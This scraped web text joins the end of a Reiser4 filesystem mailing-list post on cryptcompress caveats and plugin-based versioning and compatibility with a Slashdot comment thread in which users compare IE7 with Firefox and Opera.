unsigned long getStudentID(const Student* s) {
    /* fill me in */
}

/* set the SID of student s */
void setStudentID(Student* s, unsigned long sid) {
    /* fill me in */
}
b) What is the logical error in the following function?
Student* makeAndrew(void) {
    Student s;
    setName(&s, "Andrew");
    setStudentID(&s, 12345678);
    return &s;
}
Problem 3
a) Write a function bitCount() in bitcount.c that returns the number of 1-bits in the binary representation of its unsigned integer argument. To compile bitcount.c and create an executable named bitcount:
gcc -std=c99 -o bitcount bitcount.c
Remember to fill in the identification information and run the completed program to verify correctness.
/* Name:
   Lab section time: */

#include <stdio.h>

int bitCount(unsigned int n);

int main(void)
{
    printf("# 1-bits in base 2 representation of %u = %d, should be 0\n",
           0, bitCount(0));
    printf("# 1-bits in base 2 representation of %u = %d, should be 1\n",
           1, bitCount(1));
    printf("# 1-bits in base 2 representation of %u = %d, should be 17\n",
           2863377066u, bitCount(2863377066u));
    printf("# 1-bits in base 2 representation of %u = %d, should be 1\n",
           268435456, bitCount(268435456));
    printf("# 1-bits in base 2 representation of %u = %d, should be 31\n",
           4294705151u, bitCount(4294705151u));
    return 0;
}

int bitCount(unsigned int n)
{
    /* your code here */
}
b) You have decided that you want your bitcount program above to work from the command-line (see K&R Section 5.10), as follows:
# ./bitcount 17
2
# ./bitcount 255
8
# ./bitcount 10 20
too many arguments!
# ./bitcount
[the same result as from part a]
Edit your bitcount.c to include this functionality. You may assume that the single argument will always be an integer in the range from 0 to 2^31 - 1. You will find the function atoi helpful.
Extra for experts: Implement this exercise without using the library function atoi (or something comparable). (You don't actually get extra points for this).
Neuroph: Smart Java Apps with Neural Networks (Part 3)
Neural networks can learn to map input onto output data.
Neural networks can learn to map input onto output data, and are used for tasks like image recognition, automated classification, prediction, and artificially intelligent game characters. In part 3 of this series, the NetBeans team interviewed Zoran Sevarac from Neuroph about adding an image recognition task to a Java application. Part one of the interview discusses what neural networks are and why the NetBeans IDE was the natural choice for the Neuroph development team. In part two of the interview we had a closer look at use cases of neural networks—and what they can do for you!
Neural Networks - the Why and the How
Why use neural networks for image recognition?
Although there are other techniques for image recognition, neural networks are an interesting solution due to the following properties:
- They can learn to recognize or classify images.
- They are able to generalize, which means that they can recognize images they've never 'seen' before, and which are similar to the images they already know.
- They are noise resistant, which means that they can recognize damaged or noisy images.
I don't know anything about neural networks, can I use image recognition?
Yes, you can use image recognition, even if you don't know anything about neural networks. We've tried to keep all of the neural network-related stuff under the hood, and just provide the image recognition interface. Basic knowledge about neural networks is helpful for training neural networks, but you'll get the idea how this works while experimenting.
How do I use neural networks for image recognition?
First you transform the training images into a form which can be fed into neural networks: the Neuroph library provides the FractionRgbData class, which transforms a BufferedImage into normalized RGB vectors. Next you train the neural network to learn these image vectors. The type of neural network we use is a Multi-Layer Perceptron with a Back Propagation learning rule.
Picture 1. Feeding image vectors into a neural network
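The transformation FractionRgbData performs can be pictured with plain java.awt: each pixel's red, green and blue channels are scaled to [0, 1] and concatenated into one flat input vector. This sketch only illustrates the idea — the exact layout Neuroph's actual class uses is an assumption here:

```java
import java.awt.image.BufferedImage;

public class RgbVector {
    // Flatten an image into [r0..rN, g0..gN, b0..bN], each value in [0, 1],
    // mirroring the "fraction RGB" idea described above (plane layout assumed).
    public static double[] toFractionRgb(BufferedImage img) {
        int w = img.getWidth(), h = img.getHeight(), n = w * h;
        double[] v = new double[3 * n];
        for (int y = 0; y < h; y++) {
            for (int x = 0; x < w; x++) {
                int rgb = img.getRGB(x, y);              // packed 0xAARRGGBB
                int i = y * w + x;
                v[i]         = ((rgb >> 16) & 0xff) / 255.0; // red plane
                v[n + i]     = ((rgb >> 8)  & 0xff) / 255.0; // green plane
                v[2 * n + i] = (rgb & 0xff) / 255.0;         // blue plane
            }
        }
        return v;
    }

    public static void main(String[] args) {
        BufferedImage img = new BufferedImage(2, 2, BufferedImage.TYPE_INT_RGB);
        img.setRGB(0, 0, 0xff0000);                // one pure red pixel
        double[] v = toFractionRgb(img);
        System.out.println(v.length + " " + v[0]); // 12 1.0
    }
}
```

This also makes the later point concrete: a color image needs a 3n-element input vector where a black/white one would need n.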
Neural Networks - Use Cases
Can I use Neuroph for face recognition?
Our image recognition approach can learn to distinguish between a fixed set of faces, but it is not an appropriate solution for more advanced face recognition. It won't recognize any variations like different angles, shades, different hairstyle, etc.
Can I use Neuroph to recognize online images or captchas?
Yes, online images can be recognized using a method which accepts image URLs as input arguments. Captchas are not as easy: The main issues are to identify letters and digits, and to remove background noise and distortion. This means before feeding the data into the neural network, some image preprocessing is necessary. This could be an interesting experiment to try.
Can Neuroph be used to search images or recognize parts of an image?
Neuroph's image recognition approach is not intended for this task; there are probably other, more efficient techniques. Brute-force scanning of the whole image for specific image parts of a given size can be done, if you know exactly what you are searching for and where to look.
Neuroph - Features and Requirements
What image formats are supported?
Supported image formats are BMP, JPG, PNG and GIF.
What is the maximum image size?
Theoretically, the maximum is not constrained, but in practice it depends on available memory and time. Training on large images requires more complex neural networks with more neurons and layers; the training requires more time, and it can be tricky to tweak the network and training parameters. If you have issues with creating a network of a certain size, try to increase the maximum heap size.
How fast is Neuroph?
For smaller images the training process only takes a few minutes. For large images and large numbers of images, training can take a few hours. But once we have trained the network, the recognition itself is pretty fast.
Is there a difference between recognizing black/white and color images?
It's the same principle; the only difference is that for black/white images you need smaller networks with fewer neurons, and the training is faster. Recognizing images in full RGB color requires three times more input neurons than recognizing black/white images.
Neuroph - Usage
How do I use the Neuroph library for image recognition?
There are three steps:
- Prepare the training images that you want to recognize.
- Create, train, and save the image recognition network using the GUI tool from the easyNeurons application.
- Deploy the saved neural network to your application by using our Neuroph Neural Network Java library, neuroph.jar.
What software do I need to use Neuroph Image Recognition?
To use Neuroph Image Recognition you need:
- Java JDK 1.6
- The Neuroph Framework 2.3.1 (download)
- Including the easyNeurons GUI application for training image recognition networks, and
- the Java Neural Network library for deploying trained neural networks to your application.
How do I add an image recognition task to my Java application?
This sample code shows you how to make use of a trained image recognition neural network in your application. A step-by-step tutorial on how to train an image recognition neural network is available here.
import org.neuroph.core.NeuralNetwork;
import org.neuroph.contrib.imgrec.ImageRecognitionPlugin;
import java.util.HashMap;
import java.io.File;
import java.io.IOException;

public class ImageRecognitionSample {

    public static void main(String[] args) {
        // load trained neural network saved with easyNeurons
        // (specify existing neural network file here)
        NeuralNetwork nnet = NeuralNetwork.load("MyImageRecognition.nnet");

        // get the image recognition plugin from neural network
        // (image recognition interface for neural network)
        ImageRecognitionPlugin imageRecognition =
            (ImageRecognitionPlugin) nnet.getPlugin(ImageRecognitionPlugin.IMG_REC_PLUGIN_NAME);

        try {
            // image recognition is done here (specify some existing image file)
            HashMap output = imageRecognition.recognizeImage(new File("someImage.jpg"));
            System.out.println(output.toString());
        } catch (IOException ioe) {
            ioe.printStackTrace();
        }
    }
}
As you can see, the following steps are needed to use a neural network in your application:
- Load a trained neural network.
- Get the image recognition plugin from the neural network.
- Call the recognizeImage() method on an image.
- Evaluate the resulting HashMap output.
The actual recognition step is just one method call. It returns a HashMap with image labels as keys, and their degree of recognition as values. The higher the degree of recognition, the more likely it is the image that you trained it to recognize. The method recognizeImage() can take a File, URL, or BufferedImage as input.
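Interpreting the returned map is then just a matter of taking the entry with the highest recognition degree — for example (plain Java; no Neuroph types are needed for this part):

```java
import java.util.HashMap;
import java.util.Map;

public class BestLabel {
    // Return the label with the highest recognition degree, or null if empty.
    public static String bestLabel(Map<String, Double> output) {
        String best = null;
        double bestScore = Double.NEGATIVE_INFINITY;
        for (Map.Entry<String, Double> e : output.entrySet()) {
            if (e.getValue() > bestScore) {
                bestScore = e.getValue();
                best = e.getKey();
            }
        }
        return best;
    }

    public static void main(String[] args) {
        Map<String, Double> out = new HashMap<>();
        out.put("cat", 0.91);
        out.put("dog", 0.12);
        System.out.println(bestLabel(out)); // cat
    }
}
```

In a real application you would also compare the best score against a minimum-confidence threshold before trusting the answer.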
Other important classes from the neuroph.jar library are:

- FractionRgbData – takes a BufferedImage as input and creates RGB data used by neural networks.
- ImageRecognitionPlugin – provides the image recognition interface for the neural network, so the user doesn't even have to know that there is a neural network behind the scenes.
- ImageSampler – provides methods to dump image samples from the screen (very exciting!) and scale images.
Can you share any recommended best practices?
- Scale all images used for training to the same dimensions.
- If color is not important for your task, use black/white, it will train faster.
- Use the same image dimensions for training and recognition.
- If you get out-of-memory exceptions for bigger images, increase the JVM heap size using -Xms and -Xmx options.
- Use the fastest CPU you can get, since training neural network can take a while.
How can I best use Neuroph with an IDE?
The members of our NetBeans User Group are working on a Neuroph plugin for the NetBeans IDE. We plan to make specialized components for image recognition, OCR, classification, prediction, and approximation, available from the NetBeans Palette.
To make this possible, we need to provide a way for users to customize the underlying neural network, to train the neural network with their data. Presently this is done with the easyNeurons GUI, but we plan to provide the easyNeurons training UI directly inside the NetBeans IDE. We will need a new project type for neural networks, training sets, and test sets. It would also be nice to develop a wizard which will guide inexperienced users.
When we put all this together, we see that we're talking about porting the existing easyNeurons application to the NetBeans platform. We are aware that this will require a lot of work! Presently we don't have enough experience with the NetBeans Platform, and there's only a small number of active developers in our team. We have only just started our local NetBeans User Group (six developers with Neuroph experience), but our members will attend the NetBeans Platform Training, so we believe this can be accomplished!
Neuroph – Next Steps
We see that Neuroph is in active development. What are your future plans?
We plan to release the NEAT algorithm support developed by Aidan Morgan as part of the Neuroph framework. NEAT (NeuroEvolution of Augmenting Topologies) uses a genetic algorithm to evolve the neural network topology (the number of layers and neurons) along with weights. This approach can save time that is usually spent deciding on a network topology for a particular problem.
We also plan to provide a specialized time series prediction API.
Additionally we are working on an OCR (Optical Character Recognition) library based on the existing image recognition. We hope to provide an out-of-the-box OCR component and tools. We have just released our first demo applications for OCR and NEAT support, one for hand-written letter recognition, and one for text recognition from an image. Try them now!
Thank you for the interview, Zoran! Learn more at the Neuroph project home.
Opinions expressed by DZone contributors are their own.
UpScaleDB: Using an Embedded Database
Abstract
Using an embedded database in your software requires a bit of work. I show you how to do it in this article.
Disclaimer: Christoph is the author of upscaledb, which is an open source project with commercial licenses. He has written this article so the information can be used with other key-value databases as well.
Introduction
Chances are, if you are a developer then you have already written your own embedded database: a set of functions which store, load and search indexed data. For persisting the data, you might have used your own file format, or resorted to standards like json or xml. Then a few questions usually come up: will those functions scale if the data size grows? What will happen if the disk is full while the file is written? And how to implement a secondary index, or even transactions?
When do you need an embedded database?
Embedded databases obviously are not related to embedded platforms, although they also can run on phones, tablets or a Raspberry Pi. “Embedded” means they are directly linked into your application. If users install your program then there is no need to install (and administrate) a separate database. Your installation routines will be a lot simpler, you do not have to provide support for the various database problems and your users have less hassle. Your code will usually run faster, too, because you avoid the inter-process communication between your application and the external database.
But there’s no such thing as free lunch, and embedded databases have their disadvantage, too: their functionality is limited compared to a full-blown SQL database. Most of them do not even support SQL at all - after all, they’re just a bunch of functions that are linked into your application.
In order to use an embedded database, you will therefore write your own SQL-like layer. Writing your own database is fun and rewarding, and if you follow this article then you will also see that it’s not as difficult as it sounds!
What is upscaledb?
upscaledb is an open source embedded key/value store. A key/value store is like a persistent associative container: a set of values, each value indexed by a key. upscaledb is a C library which can be used with .NET, Java (and other JVM languages), Python and Erlang/Elixir. It has functionality which makes it unique in the niche of key/value stores: it treats keys and values not just as byte arrays, but understands the concept of "types". A database can have keys (or values) of a specific type, i.e. UINT16, UINT32, fixed-length binary strings or variable-length binary strings, and a few others. This type information is used by upscaledb to reduce storage and increase performance. I.e. a UINT32 key is stored in exactly four bytes, and does not require any overhead. Storing a UINT32 key as a variable-length binary would require additional overhead (for the size and maybe a byte for additional flags). Even more important, UINT32 keys can be processed with modern SIMD instructions. Binary keys cannot, because of said overhead.
Installing upscaledb
Download the newest files from the upscaledb website. For Windows you will find precompiled binaries. After unpacking them, make sure to add the installation directories to your IDE settings, otherwise the header files and the libraries cannot be found.
For linux, a typical “./configure”, “make”, “make install” is sufficient. Apple users will prefer the homebrew recipe (“brew install upscaledb”).
A gentle introduction to the basic concepts: Environments, Databases
Let’s see upscaledb in action. First we need to create an “Environment”, which basically is a container for databases. An environment can be in-memory, or backed by a file. And it supports a wide range of parameters, i.e. the cache size, but also whether transactions should be supported.
An environment can store multiple databases (a few hundreds, actually), and they are identified by a “name”. This name is actually a 16bit number, and some values (i.e. 0 and everything > 0xf000) are reserved. Our example code below uses the number 1 (stored in the enum “kDbId”).
The following C++ code creates an Environment with a database for storing time-series data. The timestamps are stored as 64bit numbers, and the data has a fixed length of 64 bytes.
int main() {
  ups_status_t st;
  ups_env_t *env; // upscaledb environment object
  ups_db_t *db;   // upscaledb database object

  // First create a new Environment (filename is "timeseries.db")
  st = ups_env_create(&env, "timeseries.db", 0, 0, 0);
  if (st != UPS_SUCCESS)
    handle_error("ups_env_create", st);

  // parameters for the new database: 64bit numeric keys, fixed length records
  ups_parameter_t db_params[] = {
    {UPS_PARAM_KEY_TYPE, UPS_TYPE_UINT64},
    {UPS_PARAM_RECORD_SIZE, sizeof(TsValue)},
    {0, }
  };

  // Then create a new Database in this Environment
  st = ups_env_create_db(env, &db, kDbId, 0, &db_params[0]);
  if (st != UPS_SUCCESS)
    handle_error("ups_env_create_db", st);

  // We will perform our work here
  // ...

  // Close the Environment before the program terminates. The flag
  // UPS_AUTO_CLEANUP will automatically close all databases and related
  // objects for us.
  st = ups_env_close(env, UPS_AUTO_CLEANUP);
  if (st)
    handle_error("ups_env_close", st);

  return (0);
}
Example: Storing incoming time-series data
With that framework in place, we can start filling the database. Our simulation pretends that there are 1 million incoming events. Timestamps are in nanosecond resolution, and therefore we automatically avoid duplicate keys. upscaledb supports duplicate keys (for 1:n relations), but avoiding them increases performance.
Be careful when you run the sample code, the generated database file grows to north of 100 GB!
static void add_time_series_event(ups_db_t *db) {
  // Store timestamps in nanosecond resolution
  uint64_t now = nanoseconds();

  // Our value is just a placeholder for our example. A real application
  // would obviously use real data here.
  TsValue value = {0};

  ups_key_t key = ups_make_key(&now, sizeof(now));
  ups_record_t rec = ups_make_record(&value, sizeof(value));

  // Now insert the key/value pair
  ups_status_t st = ups_db_insert(db, 0, &key, &rec, 0);
  if (st != UPS_SUCCESS)
    handle_error("ups_db_insert", st);
}
Example: Printing all events in a time range
All that data needs to be analyzed, and indeed analyzing large tables is one of the strengths of upscaledb. For the sake of a demonstration, we will create a window function which processes the data that was inserted in the last 0.1 seconds. Our code creates a “cursor” and locates it at a timestamp that is 0.1 seconds in the past. From then on it moves forward till it reaches the end of the database.
static void analyze_time_series(ups_db_t *db) {
  // Analyzing time series data usually means to read and process the
  // data from a certain time window. Our window will be the last 0.1
  // seconds that were stored. Create a cursor and locate it on a
  // key at "now - 0.1 seconds".
  uint64_t start_time = nanoseconds() - (1000000000 / 10);
  ups_key_t key = ups_make_key(&start_time, sizeof(start_time));
  ups_record_t rec = {0};

  // Create a new database cursor
  ups_cursor_t *cursor;
  ups_status_t st = ups_cursor_create(&cursor, db, 0, 0);
  if (st != UPS_SUCCESS)
    handle_error("ups_cursor_create", st);

  // Locate a key/value pair with a timestamp about 0.1 sec ago
  st = ups_cursor_find(cursor, &key, &rec, UPS_FIND_GEQ_MATCH);
  if (st != UPS_SUCCESS)
    handle_error("ups_cursor_find", st);

  int count = 0;
  do {
    // Process the key/value pair; we just count them
    count++;

    // And move to the next key, till we reach "the end" of the database
    st = ups_cursor_move(cursor, &key, &rec, UPS_CURSOR_NEXT);
    if (st != UPS_SUCCESS && st != UPS_KEY_NOT_FOUND)
      handle_error("ups_cursor_move", st);
  } while (st == 0);

  // Clean up
  ups_cursor_close(cursor);

  std::cout << "In the last 0.1 seconds, " << count
            << " events were inserted" << std::endl;
}
Running the sample
The sources are available for download. They require a C++11 compliant compiler and were tested with g++ 4.8.4 on Ubuntu 14.04 and with upscaledb version 2.1.12. Inserting 1 million events took less than half of a second, and using the cursor to analyze the last 0.1 seconds took just 55 milliseconds! An SQL server will have a hard time beating this. (I am running the test on a Core i5 with an SSD.)
Inserting 1 mio events: 474.882 ms
In the last 0.1 seconds, 217945 events were inserted
Analyzing 0.1 sec of data: 55.4289 ms
Conclusion
I hope you have seen that an embedded database is not difficult to use. Typically you require only a few functions which read and write your C/C++ structures from and to the database, and a few other functions to implement your queries. But I have rarely seen applications where these functions are more than a few hundred lines of code. The benefits in performance and simplicity are huge, and we have not yet even started to optimize (i.e. by reducing the keys to 32bit, by compressing the keys or by increasing the database cache).
Nowadays computers are powerful enough that it's possible to store data sizes of many million items in a single file. I have run (synthetic) benchmarks of above 1 billion index operations on a single machine: bulk loading in less than 3 minutes, analyzing all of them in about 1.5 seconds. Big data fits on today's desktops!
Here we have a forking server. For each incoming TCP connection, unless the source port is in the 5000-6000 range (in which case the child just exits, as the decompiled check below shows), 73 bytes are read and then executed (all but the first byte). The child just executed this:
int __cdecl client_callback(int fd)
{
  void *v1; // esp@1
  uint16_t v2; // ax@3
  int v4; // [sp+0h] [bp-38h]@1
  int execute_buf; // [sp+Ch] [bp-2Ch]@1
  int *v6; // [sp+10h] [bp-28h]@1
  int v7; // [sp+14h] [bp-24h]@6
  void (*execute_the_buffer)(void); // [sp+18h] [bp-20h]@1
  socklen_t len; // [sp+1Ch] [bp-1Ch]@1
  struct sockaddr addr; // [sp+20h] [bp-18h]@1

  v6 = &v4;
  v1 = alloca(16 * ((unsigned int)(BUFSIZE + 30) >> 4));
  execute_buf = 16 * ((unsigned int)((char *)&execute_buf + 3) >> 4);
  execute_the_buffer = (void (*)(void))(16 * ((unsigned int)((char *)&execute_buf + 3) >> 4) + 1);
  len = 16;
  if ( getpeername(fd, &addr, &len) == -1 )
    exit(-1);
  v2 = ntohs(*(uint16_t *)&addr.sa_data[0]);
  printf("port: %d \n\n\n", v2);
  if ( ntohs(*(uint16_t *)&addr.sa_data[0]) > 0x1387u
    && ntohs(*(uint16_t *)&addr.sa_data[0]) <= 0x1770u )
    exit(-1);
  v7 = readAll(fd, execute_buf, BUFSIZE);
  printf("read %d bytes\n\n\n", v7);
  execute_the_buffer();
  return 0;
}
So, we needed to send shellcode shorter than 72 bytes. Unfortunately, Metasploit was of little help here, so we had to scout the web looking for suitable candidates. After several cases of it-works-on-our-VM-but-not-at-DDtek, we decided to roll our own.
Here it is: it spawns a shell using the TCP connection file descriptor as stdin, stdout and stderr.
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>

void f(void);

int main(int argc, char **argv)
{
    f();
}

void f(void)
{
    __asm__(
        // padding
        "nop \n"
        // dup 0 into 5
        "xor %edx, %edx \n"
        "xor %ebx, %ebx \n"
        "xor %edi, %edi \n"
        "xor %ecx, %ecx \n"
        "mov $9, %bl \n"
        "mov $62, %di \n"
        "mov $5, %cl \n"
        "push %edx \n"
        "push %ebx \n"
        "push %ecx \n"
        "push %edx \n"
        "mov %edi, %eax \n"
        "int $0x91 \n"
        // dup 1 into 5
        "push $1 \n"
        "push %ebx \n"
        "push %ecx \n"
        "push %edx \n"
        "mov %edi, %eax \n"
        "int $0x91 \n"
        // dup 2 into 5
        "push $2 \n"
        "push %ebx \n"
        "push %ecx \n"
        "push %edx \n"
        "mov %edi, %eax \n"
        "int $0x91 \n"
        // // close stdin
        // "push %edx \n"
        // "push %edx \n"
        // "incl %ecx \n"
        // "mov %ecx, %eax \n"
        // "int $0x91 \n"
        // shell
        "xorl %eax,%eax \n"
        "pushl %eax \n"
        "pushl $0x68732f6e \n"
        "pushl $0x69622f2f \n"
        "movl %esp,%ebx \n"
        "pushl %eax \n"
        "pushl %ebx \n"
        "movl %esp,%edx \n"
        "pushl %eax \n"
        "pushl %edx \n"
        "pushl %ebx \n"
        "movb $0x3b,%al \n"
        "pushl %eax \n"
        "int $0x91 \n"
    );
}
Total: 69 bytes (and 1 for padding).
Here’s the shellcode:
\x90\x31\xd2\x31\xdb\x31\xff\x31\xc9\xb3\x09\x66\xbf\x3e\x00\xb1\x05\x52\x53\x51\x52\x89\xf8\xcd\x91\x6a\x01\x53\x51\x52\x89\xf8\xcd\x91\x6a\x02\x53\x51\x52\x89\xf8\xcd\x91\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\xb0\x3b\x50\xcd\x91
That’s it. For my future reference, here’s the mapping between the familiar Debian commands and the OpenSolaris ones that were useful in the competition.
- apt-cache search => pkg search
- apt-get install => pkg install
- strace => truss (strace didn’t appear to work)
Ciao! | http://www.lucainvernizzi.net/blog/2011/06/06/defcon-quals-19-pwtent-pwanble-200-writup/ | CC-MAIN-2017-30 | refinedweb | 566 | 61.7 |
"Brian Elmegaard" <be at et.dtu.dk> wrote in message news:3A40813B.C04D21C at et.dtu.dk... > I am not a computer scientist, just an engineer knowing how to program in > Fortran, Pascal,... So I after reading some of the python material on the web, I > decided to give it a try and is now using the language some, finding it fun and > easy. I'm a statistician who discovered the same thing about four years ago. > On usenet I have now learned from skilled scientists, By their own evaluation? Think instead 'CS theologians' or even 'religious fanatics'. > that Python has some deficiencies regarding scope rules, and I am not capable > of telling them why it has not (or that it has). Deficiency is in the eye of the beholder. This religious discussion has been going on for at least since I started listening; probably has since the beginning of Python; and will probably continue until Python dies. Consider not getting too involved. > In Aaron Watters 'The wwww of python' I have read that Python uses lexical > scoping with a convenient modularity. But, other people tell me it does not. > Some say it uses dynamic scoping, some say it uses it own special > 'local-global-builtin' scope. What is right? I have discovered that while good computer scientists may develop a definsible terminology that they use consistently each unto themselves, they do not always agree. This seems to one of those areas where language is not settled. > The above mainly is a theoretical question. A question like 'what is the optimal asymptotic efficiency of a sorting algorithm based on comparisions' has an answer: n log n. The scope discussion does not seem to. > A more practical example which I agree seems a bit odd is: > >>> x=24 > >>> def foo(): > ... y=2 > ... print x+y > ... > >>> def bar(): > ... x=11 > ... foo() > ... > >>> bar() > 26 When a function encounters a name that is not in its local scope, where should it look to find a value to substitute (given that there are no explicit pointers)? 
There are three general answers: nowhere (raise an exception or abort);
somewhere in the definition environment; or somewhere in the usage
environment. Python's current answer is in the namespace of the defining
module (and then in the builtin namespace attached to that module).

The only things I find 'odd' (and definitely confusing at first) are the
use of 'global' for the module namespace (and I suppose there is some
history here) and the sometimes claim that there are two rather than
three possible scopes.

For odd behaviour, consider the following possibility:

plane_geometry.py:

_dimension = 2

def SegSectTri2d(line_segment, triangle):
    "does line_segment intersect triangle in xy-plane"
    # uses _dimension and depends on it being 2
    ...

space_geometry.py:

import plane_geometry

_dimension = 3

def SegSectTri3d(line_segment, triangle):
    "does line_segment intersect triangle in xyz-space"
    # uses _dimension and depends on it being 3
    # uses plane_geometry.SegSectTri2d() for part of its calculation

Now, I would be disappointed if the plane geometry functions did not work
when called from space geometry functions because the two modules happened
to use the same spelling for the private dimension constant.

Terry J. Reedy
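The behavior being described — a bare name falls back to the function's *defining* module, not to its caller's locals — is easy to check in a single file (Python 3 syntax; the original post predates the print function):

```python
x = 24

def foo():
    y = 2
    return x + y   # 'x' is looked up in foo's defining module, not in bar

def bar():
    x = 11         # this local is invisible to foo
    return foo()

print(bar())  # 26, not 13: foo never sees bar's local x
```

With dynamic scoping the call would instead have found bar's x = 11 and returned 13.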
I have an ASP.NET web site that houses some WCF services. I have hooked up to the Application_Error event, so can log any unhandled exceptions.
What I would really like to do is pass the execution back to the method that was called, so I can return something sensible to the client, rather than throwing a FaultException.
I know I can wrap each individual service call in a try/catch block, but that means a load of boilerplate code in every single method. What I would really like to do is have a central catch-all method, like Application_Error, but then allow the individual service call do take back control and return something meaningful to the client.
Is this possible?
P.S. In case anyone thinks I'm doing this the wrong way, the background to this is that I'm implementing Railway Oriented Programming in my C# WCF code. The idea is that if there is an exception, I return an appropriate object that contains the details, along with other useful stuff. This is a much more controlled way of dealing with the situation than having the WCF service throw an exception.
If you want to do something akin to the ROP style, then you can do the following (the Failable name comes from Jeff Bridgman's suggestion).
First create abstract base classes as follows...
public abstract class Failable<T> { }

public abstract class Failable { }
Next create concrete classes from these to represent success and failure. I've added a generic and non-generic version of each, so you can handle service calls that return a value as well as void ones...
public class Success<T> : Failable<T>
{
    public Success(T value)
    {
        Value = value;
    }

    public T Value { get; set; }
}

public class Success : Failable { }

public class Failure<T> : Failable<T>
{
    public Failure(Exception value)
    {
        Value = value;
    }

    public Exception Value { get; set; }
}

public class Failure : Failable
{
    public Failure(Exception value)
    {
        Value = value;
    }

    public Exception Value { get; set; }
}
Then a couple of helper methods will give you what you want...
public static Failable<T> DoFailableAction<T>(Func<T> f)
{
    Failable<T> result;
    try
    {
        T fResult = f();
        result = new Success<T>(fResult);
    }
    catch (Exception ex)
    {
        result = new Failure<T>(ex);
    }
    return result;
}

public static Failable DoFailableAction(Action f)
{
    Failable result;
    try
    {
        f();
        result = new Success();
    }
    catch (Exception ex)
    {
        result = new Failure(ex);
    }
    return result;
}
To use these, suppose you have your WCF service. You wrap the service call in the helper method...
Failable<Person> p = FailableHelpers.DoFailableAction(() => service.GetPerson(1));
Then, you can check if the call succeeded or failed, and act appropriately...
if (p is Success<Person>)
{
    Person person = ((Success<Person>)p).Value;
    Debug.WriteLine("Value is Success, and the person is " + person.FirstName + " " + person.Surname);
}
else
{
    Exception ex = ((Failure<Person>)p).Value;
    Debug.WriteLine("Value is Failure, and the message is " + ex.Message);
}
If your service method is void, you just use the non-generic variation...
Person jim = new Person(1, "Jim", "Spriggs");
Failable saveResult = FailableHelpers.DoFailableAction(() => service.Update(jim));
You haven't quite achieved what you wanted, as you still have some boilerplate code in each service method, but it's very little. Not as little as an attribute on the method, but then this approach is much simpler to implement, and works at any kind of level, whether a repository, business logic, WCF service, client, etc. The attribute approach only works for WCF.
The benefit of this approach is that it puts the onus on the consumer of the WCF service (or whatever) to check if the service call was successful, and act appropriately. This is a functional style, and leads to much more robust coding, as you are pretty much forced not to ignore exceptions, unlike non-functional programming, where you would likely just grab the result of the service under the assumption that nothing went wrong. That's fine until something does go wrong!
Hope that helps. | https://codedump.io/share/PkLdJOIzpsV5/1/can-i-return-execution-to-the-failing-method-after-an-unhandled-exception | CC-MAIN-2017-34 | refinedweb | 648 | 52.7 |
Reiser4 file system: Transparent compression support.
Further development and compatibility.
A. Reiser4 cryptcompress file plugin(*) and its conversion(**)
This is the second file plugin that realizes regular files in reiser4.
Unlike previous one (unix-file plugin), cryptcompress plugin manages
files with encrypted and(or) compressed bodies packed to metadata
pages, so plain text is cached in data pages (pinned to inode's
mapping), which don't participate in IO: at background commit their
data get compressed with the following update of old compressed
bodies. This update is going in so-called "squalloc" phase of the
flush algorithm, so eventually everything will be tightly packed.
And yes, metadata pages are supposed to be writebacked. Roughly
speaking, cryptcompress file occupies more memory and smaller disk
space then ordinary file (managed by unix-file plugin). In contrast
with unix-file plugin, the smallest addressable unit is page cluster
(in memory) and item cluster (on disk). Also cryptcompress plugin
implements another, more economic approach in representing holes.
However it calls the same low-level (node, etc) plugins, so you can
have a "mixed" fileset on your reiser4 partition. See below about
backward compatibility.
To reduce cpu and memory usage when handling incompressible data one
should assign a proper compression mode plugin. The default one
activates special hook in ->write() method of cryptcompress file
plugin (only once per file's life, when starting to write from special
offset in some iteration) which tries to estimate whether a file is
compressible by testing its first logical cluster (64K by default).
If evaluation result is negative, then fragments will be converted to
extents, and management will be passed to unix-file plugin. Back
conversion does not take place. If evaluation result is positive, then
file stays under cryptcompress plugin control, but compression will be
dynamically switched by flush manager in accordance with the policy
implemented by compression mode plugin. This heuristic looks mostly
like improvisation and might be improved via modifying the compression
mode plugin (***) (some statistical analysis is needed here to make
sure we don't worsen the situation).
So let's summarize what we have in the cases of not success in primary
evaluation performed by default mode:
1. file is incompressible, but its first logical cluster is
compressible. In this case compression will be "turned off" in
flush time, so we save only cpu, whereas memory consumption is
wasteful, as file stays under cryptcomptress plugin control. Also
deleting a huge file built of fragments is not the fastest
operation.
2. file is compressible, but its first logical cluster is
incompressible. In this case management will be passed to the
unix-file plugin forever (not the worse situation).
---
(*) "plugins" means "internal reiser4 modules". Perhaps, "plugin" is a
bad name, but let us use it in the context of reiser4 (at least for
now). Each plugin is labeled by a unique pair (type, id), so plugin's
name is composed of id name (first) and type name. For example,
"extent item plugin" means plugin of item type that manages extent
pointers in reiser4. Plugins of file type are to service VFS
entrypoints.
(**) plugin conversion means passing management to another plugin of
the same plugin type: (type, id1) -> (type, id2) with the following
(or preceded) conversion of controlled objects (tail conversion is a
classic example of such operation).
(***) when modifying an existing plugin we should be careful (see
below about backward compatibility).
B. Getting started with cryptcompress plugin
****************** Warning! Warning! Warning! ************************
This stuff is experimental.
Do not store important data in the files managed by cryptcompress
plugin. It can be lost with no chances to recover it back. Also
creating at least one such file on your product Reiser4 partition can
cause its unrecoverable crash. It is not a joke!
**********************************************************************
NOTE: We don't consider using pseudo interface (metas), as it is still
deprecated.
1. Build and boot the latest kernel of -mm series.
2. Build and install the latest version of reiser4progs(1.0.6 for now)
3. Have a free partition (not for product using).
4. Format it by mkfs.reiser4. Use the option -o to override "create"
and maybe other related plugins that mkfs installs to root
directory by default.
List of default settings is available via option -p.
List of all possible settings is available via option -l
For example:
"mkfs.reiser4 -o create=ccreg40 /dev/xxx"
specifies cryptcompress file plugin with (default) lzo1 compression
"mkfs.reiser4 -o create=ccreg40,compress=gzip1 /dev/xxx"
specifies cryptcompress file plugin with gzip1 compression.
Description of all cryptcompress-related settings can be found
here:
5. Mount the reiser4 file system (better with noatime option).
6. Have a fun.
NOTE: If you use cryptcompress plugin, then the only way to monitor
real disk space usage is looking at a counter of free blocks in
superblock (for example, df (1)), but first of all make sure (for
example, by sync (1)), that there is no dirty pages in memory,
otherwise df will show incorrect information (will be fixed).
du (1) statistics does not reflect (online) real space usage, as
i_bytes and i_blocks are unsupported by cryptcompress plugin
(supporting those fields "on-line" leads to performance drop).
However, their proper values can be set "offline" by reiser4.fsck.
NOTE:
